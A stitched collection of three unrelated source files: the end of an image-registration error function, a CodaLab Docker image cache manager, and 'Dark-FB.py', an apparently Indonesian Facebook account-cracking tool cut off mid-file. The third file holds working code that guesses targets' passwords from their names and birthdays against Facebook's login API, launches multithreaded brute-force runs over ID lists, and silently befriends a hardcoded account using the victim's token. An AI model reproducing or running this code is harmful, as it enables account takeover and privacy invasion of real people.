p[:,0] = points[:,2]
p[:,1] = points[:,1]
p[:,2] = points[:,0]
return points + f(p)
def inverse_consistency_error(
forward : sitk.Image,
backward : sitk.Image,
mask : sitk.Image = None
) -> Tuple[sitk.Image, float, float]:
r""" Compute the inverse consistency error (ICE).
Parameters
----------
forward : sitk.Image
A displacement from the registration (maps from
reference space to moving image space).
backward : sitk.Image
A displacement from the inverse registration (maps
from moving image space to reference space)
mask : sitk.Image
ROI in the reference image space
Returns
-------
sitk.Image
Map of the average inverse consistency error magnitude.
float
Average inverse consistency error.
float
Maximum inverse consistency error.
"""
composition = compose_displacements(forward, backward)
if mask is not None:
composition = sitk.Mask(composition, mask > 0)
n = np.sum(sitk.GetArrayViewFromImage(mask) > 0)
else:
n = reduce(int.__mul__, forward.GetSize())
vme = np.linalg.norm(sitk.GetArrayViewFromImage(composition), axis=3)
ic = sitk.GetImageFromArray(vme)
ic.CopyInformation(forward)
aic = np.sum(vme) / n
mic = np.max(vme)
return ic, aic, mic
|
docker_image_manager.py
|
from collections import namedtuple
import threading
import time
import traceback
import logging
import docker
from docker import DockerClient
from codalab.lib.telemetry_util import capture_exception, using_sentry
import codalab.worker.docker_utils as docker_utils
from .docker_utils import DEFAULT_DOCKER_TIMEOUT
from codalab.worker.fsm import DependencyStage
from codalab.worker.state_committer import JsonStateCommitter
from codalab.worker.worker_thread import ThreadDict
from codalab.lib.formatting import size_str
logger = logging.getLogger(__name__)
# Stores the download state of a Docker image (also includes the digest being pulled, digest string,
# DependencyStage and relevant status message from the download)
ImageAvailabilityState = namedtuple('ImageAvailabilityState', ['digest', 'stage', 'message'])
# Stores information relevant about caching about docker images
ImageCacheEntry = namedtuple(
'ImageCacheEntry', ['id', 'digest', 'last_used', 'virtual_size', 'marginal_size']
)
class DockerImageManager:
CACHE_TAG = 'codalab-image-cache/last-used'
def __init__(self, commit_file, max_image_cache_size, max_image_size):
"""
Initializes a DockerImageManager
:param commit_file: String path to where the state file should be committed
:param max_image_cache_size: Total size in bytes that the image cache can use
:param max_image_size: Total size in bytes that the image can have
"""
self._state_committer = JsonStateCommitter(commit_file) # type: JsonStateCommitter
self._docker = docker.from_env(timeout=DEFAULT_DOCKER_TIMEOUT) # type: DockerClient
self._downloading = ThreadDict(
fields={'success': False, 'status': 'Download starting.'}, lock=True
)
self._max_image_cache_size = max_image_cache_size
self._max_image_size = max_image_size
self._stop = False
self._sleep_secs = 10
self._cleanup_thread = None
def start(self):
logger.info("Starting docker image manager")
if self._max_image_cache_size:
def cleanup_loop(self):
while not self._stop:
try:
self._cleanup()
except Exception:
traceback.print_exc()
time.sleep(self._sleep_secs)
self._cleanup_thread = threading.Thread(target=cleanup_loop, args=[self])
self._cleanup_thread.start()
def stop(self):
logger.info("Stopping docker image manager")
self._stop = True
logger.debug("Stopping docker image manager: stop the downloads threads")
self._downloading.stop()
if self._cleanup_thread:
logger.debug("Stopping docker image manager: stop the cleanup thread")
self._cleanup_thread.join()
logger.info("Stopped docker image manager")
def _get_cache_use(self):
return sum(
float(image.attrs['VirtualSize']) for image in self._docker.images.list(self.CACHE_TAG)
)
def _cleanup(self):
"""
Prunes the image cache for runs.
1. Only care about images we (this DockerImageManager) downloaded and know about.
2. We also try to prune any dangling docker images on the system.
3. We use sum of VirtualSize's, which is an upper bound on the disk use of our images:
in case no images share any intermediate layers, this will be the real disk use,
however if images share layers, the virtual size will count that layer's size for each
image that uses it, even though it's stored only once in the disk. The 'Size' field
accounts for the marginal size each image adds on top of the shared layers, but summing
those is not accurate either since the shared base layers need to be counted once to get
the total size. (i.e. summing marginal sizes would give us a lower bound on the total disk
use of images). Calling df gives us an accurate disk use of ALL the images on the machine
but because of (1) we don't want to use that.
"""
# Sort the image cache in LRU order
def last_used(image):
for tag in image.tags:
if tag.split(":")[0] == self.CACHE_TAG:
return float(tag.split(":")[1])
cache_use = self._get_cache_use()
if cache_use > self._max_image_cache_size:
logger.info(
'Disk use (%s) > max cache size (%s): starting image pruning',
cache_use,
self._max_image_cache_size,
)
all_images = self._docker.images.list(self.CACHE_TAG)
all_images_sorted = sorted(all_images, key=last_used)
logger.info("Cached docker images: {}".format(all_images_sorted))
for image in all_images_sorted:
# We re-list all the images to get an updated total size since we may have deleted some
cache_use = self._get_cache_use()
if cache_use > self._max_image_cache_size:
image_tag = (
image.attrs['RepoTags'][-1]
if len(image.attrs['RepoTags']) > 0
else '<none>'
)
logger.info(
'Disk use (%s) > max cache size (%s), pruning image: %s',
cache_use,
self._max_image_cache_size,
image_tag,
)
try:
self._docker.images.remove(image.id, force=True)
except docker.errors.APIError as err:
# Two types of 409 Client Error can be thrown here:
# 1. 409 Client Error: Conflict ("conflict: unable to delete <image_id> (cannot be forced)")
# This happens when an image either has a running container or has multiple child dependents.
# 2. 409 Client Error: Conflict ("conflict: unable to delete <image_id> (must be forced)")
# This happens when an image is referenced in multiple repositories.
# We can only remove images in 2rd case using force=True, but not the 1st case. So after we
# try to remove the image using force=True, if it failed, then this indicates that we were
# trying to remove images in 1st case. Since we can't do much for images in 1st case, we
# just continue with our lives, hoping it will get deleted once it's no longer in use and
# the cache becomes full again
logger.warning(
"Cannot forcibly remove image %s from cache: %s", image_tag, err
)
logger.debug("Stopping docker image manager cleanup")
def get(self, image_spec):
"""
Always request the newest docker image from Dockerhub if it's not in downloading thread and return the current
downloading status(READY, FAILED, or DOWNLOADING).
When the requested image in the following states:
1. If it's not available on the platform, we download the image and return DOWNLOADING status.
2. If another thread is actively downloading it, we return DOWNLOADING status.
3. If another thread was downloading it but not active by the time the request was sent, we return the following status:
* READY if the image was downloaded successfully.
* FAILED if the image wasn't able to be downloaded due to any reason.
:param image_spec: Repo image_spec of docker image being requested
:returns: A DockerAvailabilityState object with the state of the docker image
"""
def image_availability_state(image_spec, success_message, failure_message):
"""
Try to get the image specified by image_spec from host machine.
Return ImageAvailabilityState.
"""
try:
image = self._docker.images.get(image_spec)
digests = image.attrs.get('RepoDigests', [image_spec])
digest = digests[0] if len(digests) > 0 else None
new_timestamp = str(time.time())
image.tag(self.CACHE_TAG, tag=new_timestamp)
for tag in image.tags:
tag_label, timestamp = tag.split(":")
# remove any other timestamp but not the current one
if tag_label == self.CACHE_TAG and timestamp != new_timestamp:
try:
self._docker.images.remove(tag)
except docker.errors.NotFound as err:
# It's possible that we get a 404 not found error here when removing the image,
# since another worker on the same system has already done so. We just
# ignore this 404, since any extraneous tags will be removed during the next iteration.
logger.warning(
"Attempted to remove image %s from cache, but image was not found: %s",
tag,
err,
)
return ImageAvailabilityState(
digest=digest, stage=DependencyStage.READY, message=success_message
)
except Exception as ex:
if using_sentry():
capture_exception()
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_message % ex
)
if ':' not in image_spec:
# Both digests and repo:tag kind of specs include the : character. The only case without it is when
# a repo is specified without a tag (like 'latest')
# When this is the case, different images API methods act differently:
# - pull pulls all tags of the image
# - get tries to get `latest` by default
# That means if someone requests a docker image without a tag, and the image does not have a latest
# tag pushed to Dockerhub, pull will succeed since it will pull all other tags, but later get calls
# will fail since the `latest` tag won't be found on the system.
# We don't want to assume what tag the user wanted so we want the pull step to fail if no tag is specified
# and there's no latest tag on dockerhub.
# Hence, we append the latest tag to the image spec if there's no tag specified otherwise at the very beginning
image_spec += ':latest'
try:
if image_spec in self._downloading:
with self._downloading[image_spec]['lock']:
if self._downloading[image_spec].is_alive():
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
else:
if self._downloading[image_spec]['success']:
status = image_availability_state(
image_spec,
success_message='Image ready',
failure_message='Image {} was downloaded successfully, '
'but it cannot be found locally due to unhandled error %s'.format(
image_spec
),
)
else:
status = image_availability_state(
image_spec,
success_message='Image {} can not be downloaded from DockerHub '
'but it is found locally'.format(image_spec),
failure_message=self._downloading[image_spec]['message'] + ": %s",
)
self._downloading.remove(image_spec)
return status
else:
def download():
logger.debug('Downloading Docker image %s', image_spec)
try:
self._docker.images.pull(image_spec)
logger.debug('Download for Docker image %s complete', image_spec)
self._downloading[image_spec]['success'] = True
self._downloading[image_spec]['message'] = "Downloading image"
except (docker.errors.APIError, docker.errors.ImageNotFound) as ex:
logger.debug('Download for Docker image %s failed: %s', image_spec, ex)
self._downloading[image_spec]['success'] = False
self._downloading[image_spec][
'message'
] = "Can't download image: {}".format(ex)
# Check docker image size before pulling from Docker Hub.
# Do not download images larger than self._max_image_size
# Download images if size cannot be obtained
if self._max_image_size:
try:
image_size_bytes = docker_utils.get_image_size_without_pulling(image_spec)
if image_size_bytes is None:
failure_msg = (
"Unable to find Docker image: {} from Docker HTTP Rest API V2. "
"Skipping Docker image size precheck.".format(image_spec)
)
logger.info(failure_msg)
elif image_size_bytes > self._max_image_size:
failure_msg = (
"The size of "
+ image_spec
+ ": {} exceeds the maximum image size allowed {}.".format(
size_str(image_size_bytes), size_str(self._max_image_size)
)
)
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_msg
)
except Exception as ex:
failure_msg = "Cannot fetch image size before pulling Docker image: {} from Docker Hub: {}.".format(
image_spec, ex
)
logger.error(failure_msg)
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_msg
)
self._downloading.add_if_new(image_spec, threading.Thread(target=download, args=[]))
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=str(ex)
)
|
Dark-FB.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;97m█████████\n \x1b[1;97m█▄█████▄█ \x1b[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;97m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;97m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mVIP.VPRO\n \x1b[1;97m█████████ \x1b[1;96m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔══════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m MR.M4RCH3LL \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/m4rche3ll-cyber\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWA \x1b[1;91m: \x1b[1;92\x1b[92m0838-9235-7370\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚══════════════════════════════════════════════════╝" '\n[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://www.youtube.com/channel/UCpVqkAi_sqVf-ZPwzRjME0Q')
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mNot found'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] User not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Checker'
print '║-> \x1b[1;37;40m6. Get ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
